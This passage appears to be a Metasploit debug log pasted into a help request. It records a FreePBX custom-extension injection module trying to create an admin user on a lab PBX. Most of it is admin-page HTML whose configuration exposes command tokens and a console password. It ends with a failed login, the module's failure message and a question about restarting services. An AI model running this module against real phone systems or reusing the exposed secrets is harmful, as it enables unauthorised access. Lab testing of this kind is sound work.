Format","TRUNK_RING_TIMER":300,"AMPBADNUMBER":1,"DIALPARTIESDIALPLAN":0,"USEGOOGLEDNSFORENUM":0,"ASTSTOPTIMEOUT":"120","ASTAGIDIR":"\/var\/lib\/asterisk\/agi-bin","ASTVARLIBDIR":"\/var\/lib\/asterisk","ASTETCDIR":"\/etc\/asterisk","ASTLOGDIR":"\/var\/log\/asterisk","ASTMODDIR":"\/usr\/lib64\/asterisk\/modules","ASTRUNDIR":"\/var\/run\/asterisk","ASTSPOOLDIR":"\/var\/spool\/asterisk","AMPPLAYBACK":"\/var\/lib\/asterisk\/playback","CERTKEYLOC":"\/etc\/asterisk\/keys","AMPCGIBIN":"\/var\/www\/cgi-bin","AMPBIN":"\/var\/lib\/asterisk\/bin","AMPSBIN":"\/usr\/sbin","AMPWEBROOT":"\/var\/www\/html","MOHDIR":"moh","MIXMON_DIR":"","FOPWEBROOT":"cxpanel","FOLLOWME_AUTO_CREATE":0,"FOLLOWME_DISABLED":1,"FOLLOWME_TIME":"20","FOLLOWME_PRERING":"7","FOLLOWME_RG_STRATEGY":"ringallv2-prim","FPBXOPMODE":"advanced","BADDESTABORT":0,"XTNCONFLICTABORT":0,"CHECKREFERER":1,"ENABLEOLDDIALPATTERNS":0,"SERVERINTITLE":0,"CUSTOMASERROR":1,"RELOADCONFIRM":1,"MODULEADMINEDGE":0,"SHOWLANGUAGE":1,"SIPSECRETSIZE":32,"USE_FREEPBX_MENU_CONF":0,"MODULEADMINWGET":0,"AST_APP_VQA":"","ASTVERSION":"18.16.0","CACHE_CLEANUP_DAYS":30,"NOTICE_BROWSER_STATS":1,"mainstyle_css_generated":"","MODULE_REPO":"https:\/\/mirror.freepbx.org","SESSION_TIMEOUT":2592000,"SIPUSERAGENT":"FPBX","VIEW_ZEND_CONFIG":"views\/zend_config.php","BLACKLIST_DISABLE_GRID_COUNT":0,"ALLOW_MODULE_HOOK_IN":0,"PAGINGMAXPARTICIPANTS":40,"DPMAapps_LOG":0,"ENABLE_RESTAPPS_TOKEN_SEC":0,"PM2DISABLELOG":0,"PM2PROXY":"http:\/\/mirror.freepbx.org:6767\/","PM2SHELL":"\/bin\/bash","PM2USECACHE":1,"PM2USEPROXY":0,"PROXY_ENABLED":0,"PROXY_ADDRESS":"","PROXY_USERNAME":"","PROXY_PASSWORD":"","DASHBOARD_OVERRIDE":"","DASHBOARD_OVERRIDE_BASIC":"","VQPLUSRETENTION":"20","QSTATSDATARETENTION":30,"QSTATSSYNCCUTOFF":"1 week","QUEUES_PESISTENTMEMBERS":1,"QUEUES_SHARED_LASTCALL":1,"QUEUES_UPDATECDR":0,"QUEUES_MIX_MONITOR":1,"QUEUES_EVENTS_WHEN_CALLED_DEFAULT":0,"QUEUES_EVENTS_MEMEBER_STATUS_DEFAULT":0,"QXACTDATARETENTION":90,"QLOGDATARETENTION":0,"QXACTREMOTEDBTABLENAME":"","CDRUSEGMT":0,"EXTENSION_LIST_RINGGROUPS":0,"CRM_CACHE_EXPIRE":300,"CRM_CUSTOM_URL":"","CRM_LOG":1,"CRM_AUTH_URL":"https:\/\/api.sangoma.com\/crmauth","SANGOMACONNECTBINDADDRESS":"127.0.0.1","SANGOMACONNECTENABLED":0,"SANGOMACONNECTCLOUDTOKEN":"","SANGOMACONNECTCOMMANDTOKEN":"7c425e03aad3da19b14e0fb8ddc3a00f39fcb146","SANGOMACONNECTDOMAIN":"","SANGOMACONNECTLICENSE":"{\"org_id\":null,\"org_name\":null}","SANGOMACONNECTBINDPORT":8443,"SANGOMACONNECTTLSCERTFILE":"","SANGOMACONNECTTLSPRIVATEKEY":"","SS_API_URL":"https:\/\/push2.schmoozecom.com\/sipstation","ENABLE_SS_PJSIP":1,"IOTENABLED":1,"IOTEXPOSEWEB":0,"IOTCLOUDTOKEN":"","IOTCOMMANDTOKEN":"61ba437a51fdb4e61daf34babdead02275106bba","IOTDOMAIN":"","IOTLICENSE":"{\"location_limit\":100,\"zone_limit\":100,\"scene_limit\":100,\"group_limit\":1000,\"door_limit\":100,\"org_id\":null,\"org_name\":null}","IOTBINDPORT":8100,"IOTDISPLAYNAME":"SmartOffice","IOTTLSCERTFILE":"","IOTTLSPRIVATEKEY":"","PDFAUTHOR":"www.freepbx.org","BRAND_IMAGE_FAVICON":"images\/favicon.ico","BRAND_IMAGE_TANGO_LEFT":"images\/tango.png","BRAND_TITLE":"FreePBX Administration","BRAND_IMAGE_FREEPBX_FOOT":"images\/freepbx_small.png","BRAND_IMAGE_SPONSOR_FOOT":"images\/sangoma-horizontal_thumb.png","BRAND_FREEPBX_ALT_LEFT":"FreePBX","BRAND_FREEPBX_ALT_FOOT":"FreePBX&reg;","BRAND_SPONSOR_ALT_FOOT":"www.sangoma.com","BRAND_IMAGE_FREEPBX_LINK_LEFT":"http:\/\/www.freepbx.org","BRAND_IMAGE_FREEPBX_LINK_FOOT":"http:\/\/www.freepbx.org","BRAND_IMAGE_SPONSOR_LINK_FOOT":"http:\/\/www.sangoma.com","BRAND_CSS_ALT_MAINSTYLE":"","BRAND_CSS_ALT_POPOVER":"","BRAND_CSS_CUSTOM":"","VIEW_FREEPBX_ADMIN":"views\/freepbx_admin.php","VIEW_FREEPBX":"views\/freepbx.php","VIEW_FREEPBX_RELOAD":"views\/freepbx_reload.php","VIEW_FREEPBX_RELOADBAR":"views\/freepbx_reloadbar.php","VIEW_WELCOME":"views\/welcome.php","VIEW_WELCOME_NONMANAGER":"views\/welcome_nomanager.php","VIEW_MENUITEM_DISABLED":"views\/menuitem_disabled.php","VIEW_NOACCESS":"views\/noaccess.php","VIEW_UNAUTHORIZED":"views\/unauthorized.php","VIEW_BAD_REFFERER":"views\/bad_refferer.php","VIEW_LOGGEDOUT":"views\/loggedout.php","VIEW_PANEL":"views\/panel.php","VIEW_REPORTS":"views\/reports.php","VIEW_MENU":"views\/menu.php","VIEW_OBE":"views\/obe.php","VIEW_BETA_NOTICE":"views\/beta_notice.php","JQUERY_CSS":"assets\/css\/jquery-ui.css","VIEW_LOGIN":"views\/login.php","VIEW_HEADER":"views\/header.php","VIEW_FOOTER":"views\/footer.php","VIEW_POPOVER_JS":"views\/popover_js.php","VIEW_UCP_FOOTER_CONTENT":"views\/dashfootercontent.php","VIEW_UCP_ICONS_FOLDER":"assets\/icons","BRAND_ALT_JS":"","DASHBOARD_FREEPBX_BRAND":"FreePBX","VIEW_FOOTER_CONTENT":"views\/footer_content.php","FREEI221":1,"WHICH_asterisk":"\/usr\/sbin\/asterisk","WHICH_at":"\/usr\/bin\/at","WHICH_ffmpeg":"\/usr\/bin\/ffmpeg","WHICH_fwconsole":"\/usr\/sbin\/fwconsole","WHICH_ipset":"\/usr\/sbin\/ipset","WHICH_lame":"\/usr\/bin\/lame","WHICH_mpg123":"\/usr\/bin\/mpg123","WHICH_netstat":"\/usr\/bin\/netstat","WHICH_openssl":"\/usr\/bin\/openssl","WHICH_sox":"\/usr\/bin\/sox","WHICH_touch":"\/usr\/bin\/touch","AMPSYSLOGLEVEL":"FILE","AMPDISABLELOG":0,"LOG_OUT_MESSAGES":1,"AUTOMODULEUPDATESANDRELOAD":0,"AMPSHOWUPDATESONSSH":0,"LOG_NOTIFICATIONS":1,"MDATETIMEFORMAT":"llll","MDATEFORMAT":"l","FPBX_LOG_FILE":"\/var\/log\/asterisk\/freepbx.log","MTIMEFORMAT":"LT","PHP_CONSOLE":0,"PHP_CONSOLE_PASSWORD":"batteryhorsestaple","PHP_ERROR_HANDLER_OUTPUT":"freepbxlog","PHP_ERROR_LEVEL":"ALL_NOSTRICTNOTICE","AGGRESSIVE_DUPLICATE_CHECK":0,"AMPEXTENSIONS":"extensions","EXPOSE_ALL_FEATURE_CODES":0,"AUTHTYPE":"webserver","AMP_ACCESS_DB_CREDS":0,"FORCED_ASTVERSION":"","BROWSER_STATS":1,"CACHERTCLASSES":1,"MIXMON_FORMAT":"wav","UIDEFAULTLANG":"en_US","SIGNATURECHECK":1,"AMPTRACKENABLE":1,"REMOTEUNLOCK":0,"AMPWEBADDRESS":"","PHPTIMEZONE":"UTC","FREEPBX_SYSTEM_IDENT_REM_DASHBOARD_HELP":"no","RSSFEEDS":"http:\/\/www.freepbx.org\/rss.xml\r\nhttp:\/\/feeds.feedburner.com\/InsideTheAsterisk","FREEPBX_SYSTEM_IDENT":"VoIP Server","AMPENGINE":"asterisk","USE_GOOGLE_CDN_JS":0,"TCMAINT":1,"TCINTERVAL":"60","NODEJSENABLED":1,"NODEJSTLSENABLED":1,"NODEJSBINDADDRESS":"::","NODEJSBINDPORT":8001,"NODEJSHTTPSBINDADDRESS":"::","NODEJSHTTPSBINDPORT":8003,"NODEJSTLSCERTFILE":"\/etc\/asterisk\/keys\/integration\/certificate.pem","NODEJSTLSPRIVATEKEY":"\/etc\/asterisk\/keys\/integration\/webserver.key","UCPCHANGEPASSWORD":1,"UCPCHANGEUSERNAME":1,"UCPRSSFEEDS":"","UCPSESSIONTIMEOUT":"30","AMPUSERMANEMAILFROM":"","VMX_CONTEXT":"from-internal","VMX_LOOPDEST_CONTEXT":"","VMX_LOOPDEST_EXT":"dovm","VMX_LOOPDEST_PRI":1,"VMX_PRI":1,"VMX_TIMEDEST_CONTEXT":"","VMX_TIMEDEST_EXT":"dovm","VMX_TIMEDEST_PRI":1,"USERESMWIBLF":1,"VM_SHOW_IMAP":0,"UCP_MESSAGE_LIMIT":3000,"ENABLE_VI_PJSIP":1,"VI_API_URL":"https:\/\/backoffice.voipinnovations.com\/sipstation","ZULUENABLED":1,"ZULUMAXVIDEOSTREAMS":8,"ZULURTCMAXPORT":59999,"ZULURTCMINPORT":40000,"ZULUBINDADDRESS":"0.0.0.0","ZULUBINDPORT":8002,"ZULUCOMMANDBINDPORT":7999,"ZULUCOMMANDTOKEN":"c9edfa1db608b4d025a913e3b129dca4c885c643","ZULUCONFERENCEPREFIX":"*89","ZULUTLSCERTFILE":"\/etc\/asterisk\/keys\/integration\/certificate.pem","ZULUTLSPRIVATEKEY":"\/etc\/asterisk\/keys\/integration\/webserver.key","USEDEVSTATE":1,"USEQUEUESTATE":1,"ALWAYS_SHOW_DEVICE_DETAILS":1,"AST_FUNC_DEVICE_STATE":"DEVICE_STATE","AST_FUNC_EXTENSION_STATE":"EXTENSION_STATE","AST_FUNC_PRESENCE_STATE":"PRESENCE_STATE","AST_FUNC_SHARED":"SHARED","AST_FUNC_CONNECTEDLINE":"CONNECTEDLINE","AST_FUNC_MASTER_CHANNEL":"MASTER_CHANNEL","datasource":"","text_dir":"ltr","uniqueid":"55554bf5-f76d-4d06-a23c-4767e62d6284","dist":{"pbx_type":"freepbxdistro","pbx_version":"12.7.8-2302-1.sng7"},"ver":"16.0.33","reload_needed":true,"brandid":"freepbxdistro","modules":{"sysadmin":{"deployment_id":false,"zendid":null,"machineid":"00:15:5D:87:6C:B0"}}},"msg":{"framework":{"reload_unidentified_error":" error(s) occurred, you should view the notification log on the dashboard or main screen to check for more details.","close":"Close","continuemsg":"Continue","cancel":"Cancel","retry":"Retry","update":"Update","save":"Save","bademail":"Invalid email address","updatenotifications":"Update Notifications","securityissue":"Security Issue","validation":{"duplicate":" extension number already in use by: ","delete":"Are you sure you want to delete this?"},"noupdates":"Are you sure you want to disable automatic update notifications? This could leave your system at risk to serious security vulnerabilities. Enabling update notifications will NOT automatically install them but will make sure you are informed as soon as they are available.","noupemail":"Are you sure you don't want to provide an email address where update notifications will be sent. This email will never be transmitted off the PBX. It is used to send update and security notifications when they are detected.","invalid_responce":"Error: Did not receive valid response from server","invalid_response":"Error: Did not receive valid response from server","validateSingleDestination":{"required":"Please select a \"Destination\"","error":"Custom Goto contexts must contain the string \"custom-\".  ie: custom-app,s,1"},"weakSecret":{"length":"The secret must be at minimum six characters in length.","types":"The secret must contain at least two numbers and two letters."}}}};
var extmap={"*38":"Featurecode: allowlist_add (allowlist:Add a number to the allowlist)","*40":"Featurecode: allowlist_last (allowlist:Add the last caller to the allowlist)","*41":"Featurecode: allowlist_pause_toggle (allowlist:Pause or unpause Allowlist checking)","*39":"Featurecode: allowlist_remove (allowlist:Remove a number from the allowlist)","*30":"Featurecode: blacklist_add (blacklist:Blacklist a number)","*32":"Featurecode: blacklist_last (blacklist:Blacklist the last caller)","*31":"Featurecode: blacklist_remove (blacklist:Remove a number from the blacklist)","*72":"Featurecode: cfon (callforward:Call Forward All Activate)","*73":"Featurecode: cfoff (callforward:Call Forward All Deactivate)","*93":"Featurecode: cfpon (callforward:Call Forward All Prompting Activate)","*74":"Featurecode: cfoff_any (callforward:Call Forward All Prompting Deactivate)","*90":"Featurecode: cfbon (callforward:Call Forward Busy Activate)","*91":"Featurecode: cfboff (callforward:Call Forward Busy Deactivate)","*94":"Featurecode: cfbpon (callforward:Call Forward Busy Prompting Activate)","*92":"Featurecode: cfboff_any (callforward:Call Forward Busy Prompting Deactivate)","*52":"Featurecode: cfuon (callforward:Call Forward No Answer\/Unavailable Activate)","*53":"Featurecode: cfuoff (callforward:Call Forward No Answer\/Unavailable Deactivate)","*95":"Featurecode: cfupon (callforward:Call Forward No Answer\/Unavailable Prompting Activate)","*96":"Featurecode: cf_toggle (callforward:Call Forward Toggle)","*70":"Featurecode: cwon (callwaiting:Call Waiting - Activate)","*71":"Featurecode: cwoff (callwaiting:Call Waiting - Deactivate)","*87":"Featurecode: conf_status (conferences:Conference Status)","*10":"Featurecode: app-contactmanager-sd (contactmanager:Contact Manager Speed Dials)","*8":"Featurecode: pickupexten (core:Asterisk General Call Pickup)","555":"Featurecode: chanspy (core:ChanSpy)","**":"Featurecode: disconnect (core:In-Call Asterisk Disconnect Code)","*2":"Featurecode: atxfer (core:In-Call Asterisk Attended Transfer)","*3":"Featurecode: atxferabort (core:In-Call Asterisk Attended Transfer Aborting)","*4":"Featurecode: atxfercomplete (core:In-Call Asterisk Attended Transfer Completing)","*5":"Featurecode: atxferthreeway (core:In-Call Asterisk Attended Transfer Completing as a three-way bridge)","*6":"Featurecode: atxferswap (core:In-Call Asterisk Attended Transfer Swapping between the transferee and destination)","##":"Featurecode: blindxfer (core:In-Call Asterisk Blind Transfer)","*1":"Featurecode: automon (core:In-Call Asterisk Toggle Call Recording)","7777":"Featurecode: simu_pstn (core:Simulate Incoming Call)","*12":"Featurecode: userlogoff (core:User Logoff)","*11":"Featurecode: userlogon (core:User Logon)","*35":"Featurecode: senddictate (dictate:Email completed dictation)","*34":"Featurecode: dodictate (dictate:Perform dictation)","*78":"Featurecode: dnd_on (donotdisturb:DND Activate)","*79":"Featurecode: dnd_off (donotdisturb:DND Deactivate)","*76":"Featurecode: dnd_toggle (donotdisturb:DND Toggle)","666":"Featurecode: simu_fax (fax:Dial System FAX)","*21":"Featurecode: fmf_toggle (findmefollow:Findme Follow Toggle)","*68":"Featurecode: hotelwakeup (hotelwakeup:Wake Up Calls)","*69":"Featurecode: calltrace (infoservices:Call Trace)","*43":"Featurecode: echotest (infoservices:Echo Test)","*65":"Featurecode: speakextennum (infoservices:Speak Your Exten Number)","*60":"Featurecode: speakingclock (infoservices:Speaking Clock)","*56":"Featurecode: missedcall_on (missedcall:Missed Call Notification Activate)","*57":"Featurecode: missedcall_off (missedcall:Missed Call Notification Deactivate)","*58":"Featurecode: missedcall_toggle (missedcall:Missed Call Notification Toggle)","*80":"Featurecode: intercom-prefix (paging:Intercom prefix)","*54":"Featurecode: intercom-on (paging:User Intercom Allow)","*55":"Featurecode: intercom-off (paging:User Intercom Disallow)","*88":"Featurecode: parkto (parking:Park to your Assigned Lot)","*85":"Featurecode: parkedcall (parking:Pickup ParkedCall Prefix)","*86":"Featurecode: park (parkpro:Force Park into Private Lot)","*37":"Featurecode: Mini-bar (PMS:Add a product from mini-bar for a room.)","*36":"Featurecode: clean (PMS:Change status to clean for a room.)","*44":"Featurecode: Housekeeping Service (PMS:Send a message number to the receptionist.)","*45":"Featurecode: que_toggle (queues:Allow Dynamic Members of a Queue to login or logout. See the Queues Module for how to assign a Dynamic Member to a Queue.)","*47":"Featurecode: que_callers (queues:Playback Queue Caller Count)","*46":"Featurecode: que_pause_toggle (queues:Queue Pause Toggle)","*992":"Featurecode: restapphint (restapps:Phone App Hints)","*98":"Featurecode: dialvoicemail (voicemail:Dial Voicemail)","*":"Featurecode: directdialvoicemail (voicemail:Direct Dial Prefix)","*97":"Featurecode: myvoicemail (voicemail:My Voicemail)","70":"ParkPlus: ParkCall Default Lot","71":"ParkPlus: PickupSlot Default Lot","72":"ParkPlus: PickupSlot Default Lot","73":"ParkPlus: PickupSlot Default Lot","74":"ParkPlus: PickupSlot Default Lot","75":"ParkPlus: PickupSlot Default Lot","76":"ParkPlus: PickupSlot Default Lot","77":"ParkPlus: PickupSlot Default Lot","78":"ParkPlus: PickupSlot Default Lot"};$(document).click();</script><script type="text/javascript" src="assets/js/pbxlib_7ff942c1d3809ea259b8f0f51513c0d815cf06a1.js?load_version=16.0.33"></script><script>moment.locale('en_US');</script><script type="text/javascript" src="assets/endpoint/js/admin.js?load_version=16.0.77.1"></script><script type="text/javascript" src="assets/endpoint/js/common.js?load_version=16.0.77.1"></script><script type="text/javascript" src="assets/endpoint/js/global.js?load_version=16.0.77.1"></script><script type="text/javascript" src="assets/endpoint/js/jquery.timepicker.min.js?load_version=16.0.77.1"></script><script type="text/javascript" src="assets/endpoint/js/models.js?load_version=16.0.77.1"></script><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','ga');ga('create', 'UA-1862516-7', 'auto');ga('set', 'dimension1', fpbx.conf.dist.pbx_type);ga('set', 'dimension2', fpbx.conf.dist.pbx_version);ga('set', 'dimension3', fpbx.conf.ASTVERSION);ga('set', 'dimension4', fpbx.conf.ver);ga('set', 'dimension5', $.urlParam('display'));ga('set', 'dimension6', fpbx.conf.uniqueid);ga('send', 'pageview');</script><script type='text/javascript' src='modules/sysadmin/assets/js/activation.js'></script>
<script src='modules/sysadmin/assets/js/module-purchasing.js?v=1768488961' onload='freepbxModulePurchasing("https://katanafpbx.schmoozecom.com")' async></script>
<script type="text/javascript">
function addLoadEvent(func) {
  var oldonload = window.onload;
  if (typeof window.onload != 'function') {
    window.onload = func;
  } else {
    window.onload = function() {
      if (oldonload) {
        oldonload();
      }
      func();
    }
  }
}
//call plugin function after DOM ready
addLoadEvent(function(){
  outdatedBrowser({
    bgColor: '#f25648',
    color: '#ffffff',
    lowerThan: 'IE10',
    languagePath: ''
  })
});
</script>
<div id="outdated">
  <h6>Your browser is out-of-date!</h6>
  <p>FreePBX requires a new browser to function correctly. You can still use FreePBX with the browser you currently have but your experience may be diminished and is not supported<a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update my browser now</a></p>
  <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
  
  <script>
  $(window.console).ready(function(){
    console.log(("%c%s"), "color: green; font-size: large","FreePBX");
    console.log(("Thankyou for using %s"),"FreePBX");
    
    console.log("If you find bugs you may file a report at http://issues.freepbx.org");
    console.log("For developer resources visit: http://wiki.freepbx.org/x/BAAQ");
    
    console.log(("Framework: %s"),"16.0.33");
    console.log(("Module Name: %s"),"endpoint");
    console.log(("Module Version: %s"),"16.0.77.1");
    
  });
  </script></body>
</html>

####################
# Request:
####################
POST /admin/ajax.php?module=userman&command=checkPasswordReminder HTTP/1.1
Host: 10.5.132.167
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer: http://10.5.132.167/admin/config.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

username=msfuser5&password=dGVzdGluZzEyMzQ%3d&loginpanel=admin
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Thu, 15 Jan 2026 14:56:01 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
X-Powered-By: PHP/7.4.16
Set-Cookie: PHPSESSID=gq7tf803hvceiu0s7a4juq99ga; expires=Sat, 14-Feb-2026 14:56:01 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Headers: Content-Type, Depth, User-Agent, X-File-Size, X-Requested-With, If-Modified-Since, X-File-Name, Cache-Control, X-Auth-Token
Access-Control-Allow-Methods: POST
Access-Control-Allow-Origin: $url
Access-Control-Max-Age: 86400
Allow: POST
Content-Length: 91
Content-Type: application/json

{"status":true,"message":"Invalid Login Credentials","usertype":"admin","loginfailed":true}
[-] Failed to create new user
[*] Auxiliary module execution completed
msf auxiliary(gather/freepbx_custom_extension_injection) > 

I saw I needed to hit submit and then apply after changing the authorization. Do I need to reboot or restart a service also?